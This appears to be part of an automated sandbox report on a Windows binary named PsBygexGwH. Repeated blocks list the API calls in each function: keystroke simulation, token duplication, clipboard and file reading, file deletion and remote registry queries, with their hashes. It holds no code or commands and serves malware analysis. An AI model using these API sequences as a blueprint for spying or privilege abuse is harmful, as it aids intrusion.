                                                          • API String ID: 4054740463-328681919
                                                          • Opcode ID: 8a1ac1a76142170a4946fdd153a1b3c24cd08ea7566e861ef2375eabb384af8b
                                                          • Instruction ID: e9f1b528d84d2350e8ebd830b49dcb8a9b630e2c01e736af79160ae34442b2b7
                                                          • Opcode Fuzzy Hash: 8a1ac1a76142170a4946fdd153a1b3c24cd08ea7566e861ef2375eabb384af8b
                                                          • Instruction Fuzzy Hash: 8612B171600214ABEB259F68CC49FEE7BF8EF49714F108229F516DB2E2DB749941CB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetForegroundWindow.USER32(00000000,00000000,00000000), ref: 0013F998
                                                          • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0017F474
                                                          • IsIconic.USER32(00000000), ref: 0017F47D
                                                          • ShowWindow.USER32(00000000,00000009), ref: 0017F48A
                                                          • SetForegroundWindow.USER32(00000000), ref: 0017F494
                                                          • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0017F4AA
                                                          • GetCurrentThreadId.KERNEL32 ref: 0017F4B1
                                                          • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0017F4BD
                                                          • AttachThreadInput.USER32(?,00000000,00000001), ref: 0017F4CE
                                                          • AttachThreadInput.USER32(?,00000000,00000001), ref: 0017F4D6
                                                          • AttachThreadInput.USER32(00000000,000000FF,00000001), ref: 0017F4DE
                                                          • SetForegroundWindow.USER32(00000000), ref: 0017F4E1
                                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 0017F4F6
                                                          • keybd_event.USER32(00000012,00000000), ref: 0017F501
                                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 0017F50B
                                                          • keybd_event.USER32(00000012,00000000), ref: 0017F510
                                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 0017F519
                                                          • keybd_event.USER32(00000012,00000000), ref: 0017F51E
                                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 0017F528
                                                          • keybd_event.USER32(00000012,00000000), ref: 0017F52D
                                                          • SetForegroundWindow.USER32(00000000), ref: 0017F530
                                                          • AttachThreadInput.USER32(?,000000FF,00000000), ref: 0017F557
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                          • String ID: Shell_TrayWnd
                                                          • API String ID: 4125248594-2988720461
                                                          • Opcode ID: 7dac0dda046d377a8253058c8e9d8f5d61193d4b525ded7227cfe5d314438c5a
                                                          • Instruction ID: 2b49455629e0fcc210cd09828da0cd977c3aa1ad74594f549e2532a0c161828c
                                                          • Opcode Fuzzy Hash: 7dac0dda046d377a8253058c8e9d8f5d61193d4b525ded7227cfe5d314438c5a
                                                          • Instruction Fuzzy Hash: 5E319271B40218BBEB206BB59C4AFBF7E7CEB44B50F10412AFA05E61D1C7B05D41AEA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 001816C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0018170D
                                                            • Part of subcall function 001816C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0018173A
                                                            • Part of subcall function 001816C3: GetLastError.KERNEL32 ref: 0018174A
                                                          • LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 00181286
                                                          • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 001812A8
                                                          • CloseHandle.KERNEL32(?), ref: 001812B9
                                                          • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 001812D1
                                                          • GetProcessWindowStation.USER32 ref: 001812EA
                                                          • SetProcessWindowStation.USER32(00000000), ref: 001812F4
                                                          • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00181310
                                                            • Part of subcall function 001810BF: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,001811FC), ref: 001810D4
                                                            • Part of subcall function 001810BF: CloseHandle.KERNEL32(?,?,001811FC), ref: 001810E9
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
                                                          • String ID: $default$winsta0
                                                          • API String ID: 22674027-1027155976
                                                          • Opcode ID: 2080669171c0b2c63136cfb7461cb24f3a98bc40a9fc290878d4c7c3d57d9b14
                                                          • Instruction ID: e5b04adb30161900613aa485a6a7ad287be716d64b3d438535ba80019b8ca1ee
                                                          • Opcode Fuzzy Hash: 2080669171c0b2c63136cfb7461cb24f3a98bc40a9fc290878d4c7c3d57d9b14
                                                          • Instruction Fuzzy Hash: 71816D72900249BBDF11AFA4DC89FEE7BBDEF04704F144129F911A62A0D7718A86CF60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 001810F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00181114
                                                            • Part of subcall function 001810F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00180B9B,?,?,?), ref: 00181120
                                                            • Part of subcall function 001810F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00180B9B,?,?,?), ref: 0018112F
                                                            • Part of subcall function 001810F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00180B9B,?,?,?), ref: 00181136
                                                            • Part of subcall function 001810F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0018114D
                                                          • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00180BCC
                                                          • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00180C00
                                                          • GetLengthSid.ADVAPI32(?), ref: 00180C17
                                                          • GetAce.ADVAPI32(?,00000000,?), ref: 00180C51
                                                          • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00180C6D
                                                          • GetLengthSid.ADVAPI32(?), ref: 00180C84
                                                          • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00180C8C
                                                          • HeapAlloc.KERNEL32(00000000), ref: 00180C93
                                                          • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00180CB4
                                                          • CopySid.ADVAPI32(00000000), ref: 00180CBB
                                                          • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00180CEA
                                                          • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00180D0C
                                                          • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00180D1E
                                                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00180D45
                                                          • HeapFree.KERNEL32(00000000), ref: 00180D4C
                                                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00180D55
                                                          • HeapFree.KERNEL32(00000000), ref: 00180D5C
                                                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00180D65
                                                          • HeapFree.KERNEL32(00000000), ref: 00180D6C
                                                          • GetProcessHeap.KERNEL32(00000000,?), ref: 00180D78
                                                          • HeapFree.KERNEL32(00000000), ref: 00180D7F
                                                            • Part of subcall function 00181193: GetProcessHeap.KERNEL32(00000008,00180BB1,?,00000000,?,00180BB1,?), ref: 001811A1
                                                            • Part of subcall function 00181193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00180BB1,?), ref: 001811A8
                                                            • Part of subcall function 00181193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00180BB1,?), ref: 001811B7
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                          • String ID:
                                                          • API String ID: 4175595110-0
                                                          • Opcode ID: b470018c7735560f8bb1c347d27127c08e86603703dcc75ef2a7fea5ee22c06a
                                                          • Instruction ID: f4d40449ebb55edcd8f594d7e63593e0c2b865e5ffa8a8fec302258407443271
                                                          • Opcode Fuzzy Hash: b470018c7735560f8bb1c347d27127c08e86603703dcc75ef2a7fea5ee22c06a
                                                          • Instruction Fuzzy Hash: EC716A7690020AAFDF51EFE4DC44BAEBBB8BF08310F044615F914A7191D771AA49CFA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • OpenClipboard.USER32(001BCC08), ref: 0019EB29
                                                          • IsClipboardFormatAvailable.USER32(0000000D), ref: 0019EB37
                                                          • GetClipboardData.USER32(0000000D), ref: 0019EB43
                                                          • CloseClipboard.USER32 ref: 0019EB4F
                                                          • GlobalLock.KERNEL32(00000000), ref: 0019EB87
                                                          • CloseClipboard.USER32 ref: 0019EB91
                                                          • GlobalUnlock.KERNEL32(00000000,00000000), ref: 0019EBBC
                                                          • IsClipboardFormatAvailable.USER32(00000001), ref: 0019EBC9
                                                          • GetClipboardData.USER32(00000001), ref: 0019EBD1
                                                          • GlobalLock.KERNEL32(00000000), ref: 0019EBE2
                                                          • GlobalUnlock.KERNEL32(00000000,?), ref: 0019EC22
                                                          • IsClipboardFormatAvailable.USER32(0000000F), ref: 0019EC38
                                                          • GetClipboardData.USER32(0000000F), ref: 0019EC44
                                                          • GlobalLock.KERNEL32(00000000), ref: 0019EC55
                                                          • DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 0019EC77
                                                          • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 0019EC94
                                                          • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 0019ECD2
                                                          • GlobalUnlock.KERNEL32(00000000,?,?), ref: 0019ECF3
                                                          • CountClipboardFormats.USER32 ref: 0019ED14
                                                          • CloseClipboard.USER32 ref: 0019ED59
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
                                                          • String ID:
                                                          • API String ID: 420908878-0
                                                          • Opcode ID: a3ec4f2d0ccbee62d66b4b343ba51579830cd8919e7b947b04d6a24d9164b6da
                                                          • Instruction ID: f5092074ee3e2579ea1fd90e52d5f84dd155d3d6c2394673f79a5b8bea9131a9
                                                          • Opcode Fuzzy Hash: a3ec4f2d0ccbee62d66b4b343ba51579830cd8919e7b947b04d6a24d9164b6da
                                                          • Instruction Fuzzy Hash: 6961DF34204202AFDB00EF64D885F6AB7E4FF94714F18465DF4569B2A2DB31DD85CBA2
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • FindFirstFileW.KERNEL32(?,?), ref: 001969BE
                                                          • FindClose.KERNEL32(00000000), ref: 00196A12
                                                          • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00196A4E
                                                          • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00196A75
                                                            • Part of subcall function 00129CB3: _wcslen.LIBCMT ref: 00129CBD
                                                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 00196AB2
                                                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 00196ADF
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
                                                          • String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
                                                          • API String ID: 3830820486-3289030164
                                                          • Opcode ID: 221d2355e4bb44c72e8b1088b67e92a2e92a6cbaa3d5f03c0e700721cf746a18
                                                          • Instruction ID: 910281344aa3c180a5f4f4bc2216aad2cd40c752626eb3d48bc96cc3a52b279c
                                                          • Opcode Fuzzy Hash: 221d2355e4bb44c72e8b1088b67e92a2e92a6cbaa3d5f03c0e700721cf746a18
                                                          • Instruction Fuzzy Hash: 09D16DB2508310AEC710EBA4D991EAFB7ECBF98704F44491DF585C7191EB34DA58CBA2
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00199663
                                                          • GetFileAttributesW.KERNEL32(?), ref: 001996A1
                                                          • SetFileAttributesW.KERNEL32(?,?), ref: 001996BB
                                                          • FindNextFileW.KERNEL32(00000000,?), ref: 001996D3
                                                          • FindClose.KERNEL32(00000000), ref: 001996DE
                                                          • FindFirstFileW.KERNEL32(*.*,?), ref: 001996FA
                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 0019974A
                                                          • SetCurrentDirectoryW.KERNEL32(001E6B7C), ref: 00199768
                                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 00199772
                                                          • FindClose.KERNEL32(00000000), ref: 0019977F
                                                          • FindClose.KERNEL32(00000000), ref: 0019978F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                          • String ID: *.*
                                                          • API String ID: 1409584000-438819550
                                                          • Opcode ID: 652361b646c25fba18219bacd32aa0c4599309c3a4b610f640c9808a64127c4b
                                                          • Instruction ID: b77beea77105e57f4d6e7d78c38ce85bda1fd6a33dc79266d50f0a97f4424448
                                                          • Opcode Fuzzy Hash: 652361b646c25fba18219bacd32aa0c4599309c3a4b610f640c9808a64127c4b
                                                          • Instruction Fuzzy Hash: 5131D5325006196BDF14EFF9DC48EDE77ACAF49320F14429AF805E21A1DB74DD808EA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 001997BE
                                                          • FindNextFileW.KERNEL32(00000000,?), ref: 00199819
                                                          • FindClose.KERNEL32(00000000), ref: 00199824
                                                          • FindFirstFileW.KERNEL32(*.*,?), ref: 00199840
                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00199890
                                                          • SetCurrentDirectoryW.KERNEL32(001E6B7C), ref: 001998AE
                                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 001998B8
                                                          • FindClose.KERNEL32(00000000), ref: 001998C5
                                                          • FindClose.KERNEL32(00000000), ref: 001998D5
                                                            • Part of subcall function 0018DAE5: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 0018DB00
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                          • String ID: *.*
                                                          • API String ID: 2640511053-438819550
                                                          • Opcode ID: 93d0364eb8a7c6fe0d0df9110cf532042a911ad5274eb85d5b4b0e8a57f16916
                                                          • Instruction ID: f6472da988dfea844d476b05e0e2077671481e715e613e3c1d71f441b3551ae8
                                                          • Opcode Fuzzy Hash: 93d0364eb8a7c6fe0d0df9110cf532042a911ad5274eb85d5b4b0e8a57f16916
                                                          • Instruction Fuzzy Hash: 0D31E63150065D6FDF14EFB9EC48ADE77ACAF0A320F14429EE850A21A1DB70DE84CB60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 001AC998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,001AB6AE,?,?), ref: 001AC9B5
                                                            • Part of subcall function 001AC998: _wcslen.LIBCMT ref: 001AC9F1
                                                            • Part of subcall function 001AC998: _wcslen.LIBCMT ref: 001ACA68
                                                            • Part of subcall function 001AC998: _wcslen.LIBCMT ref: 001ACA9E
                                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 001ABF3E
                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?), ref: 001ABFA9
                                                          • RegCloseKey.ADVAPI32(00000000), ref: 001ABFCD
                                                          • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 001AC02C
                                                          • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 001AC0E7
                                                          • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 001AC154
                                                          • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 001AC1E9
                                                          • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,?,?,00000000), ref: 001AC23A
                                                          • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 001AC2E3
                                                          • RegCloseKey.ADVAPI32(?,?,00000000), ref: 001AC382
                                                          • RegCloseKey.ADVAPI32(00000000), ref: 001AC38F
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: QueryValue$Close_wcslen$BuffCharConnectOpenRegistryUpper
                                                          • String ID:
                                                          • API String ID: 3102970594-0
                                                          • Opcode ID: 7a60400484b5346d6d29e72c7312344bcb190b7556282917d954a073d6ad5a0b
                                                          • Instruction ID: 8db3dc6932ca3903ce3ba9d7546e0abfcc6ad752b75b83de48dc8bf1b5540fd2
                                                          • Opcode Fuzzy Hash: 7a60400484b5346d6d29e72c7312344bcb190b7556282917d954a073d6ad5a0b
                                                          • Instruction Fuzzy Hash: 93025C756042009FCB14DF28C891E2ABBE5FF89318F19849DF84ADB2A2D731EC45CB91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetLocalTime.KERNEL32(?), ref: 00198257
                                                          • SystemTimeToFileTime.KERNEL32(?,?), ref: 00198267
                                                          • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00198273
                                                          • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00198310
                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00198324
                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00198356
                                                          • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 0019838C
                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00198395
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: CurrentDirectoryTime$File$Local$System
                                                          • String ID: *.*
                                                          • API String ID: 1464919966-438819550
                                                          • Opcode ID: 0389702ac7c2be012d1d42ca74066716da87801004872c0834800475e2390b9c
                                                          • Instruction ID: 99d6b002b5cd13eb233543af30c09566f026d3770dbc18e043aff0bf642723f9
                                                          • Opcode Fuzzy Hash: 0389702ac7c2be012d1d42ca74066716da87801004872c0834800475e2390b9c
                                                          • Instruction Fuzzy Hash: 016148725083059FCB10EF64D8819AEB3E8FF99314F04892EF999D7251DB31EA45CB92
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 00123AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00123A97,?,?,00122E7F,?,?,?,00000000), ref: 00123AC2
                                                            • Part of subcall function 0018E199: GetFileAttributesW.KERNEL32(?,0018CF95), ref: 0018E19A
                                                          • FindFirstFileW.KERNEL32(?,?), ref: 0018D122
                                                          • DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 0018D1DD
                                                          • MoveFileW.KERNEL32(?,?), ref: 0018D1F0
                                                          • DeleteFileW.KERNEL32(?,?,?,?), ref: 0018D20D
                                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 0018D237
                                                            • Part of subcall function 0018D29C: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,0018D21C,?,?), ref: 0018D2B2
                                                          • FindClose.KERNEL32(00000000,?,?,?), ref: 0018D253
                                                          • FindClose.KERNEL32(00000000), ref: 0018D264
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
                                                          • String ID: \*.*
                                                          • API String ID: 1946585618-1173974218
                                                          • Opcode ID: 5c4faa56fb90cfb3f1d79e9ab013f723b64d7b7cea01e4b2a0545c1f8dff06db
                                                          • Instruction ID: 6b4ec1aa91152fbf1edbb8d2dd16d390a8221f7592c5b609acd82248215f2b37
                                                          • Opcode Fuzzy Hash: 5c4faa56fb90cfb3f1d79e9ab013f723b64d7b7cea01e4b2a0545c1f8dff06db
                                                          • Instruction Fuzzy Hash: 6D61493180121DAFCF05FBA4EA929EDB7B6AF65300F644165E402B7191EB30AF59CF60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                          • String ID:
                                                          • API String ID: 1737998785-0
                                                          • Opcode ID: 0a10cf2470250a767306b99e42ea477aea5fc232ac19351a80e27dc71f02d603
                                                          • Instruction ID: d946cfb1706b4e158f48adf80b00137119e1a89e44846fab5b9b0f318396c487
                                                          • Opcode Fuzzy Hash: 0a10cf2470250a767306b99e42ea477aea5fc232ac19351a80e27dc71f02d603
                                                          • Instruction Fuzzy Hash: CC415B35604611AFEB20DF55E888F1ABBE5FF44328F158599E4158BB62C735EC81CBD0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 001816C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0018170D
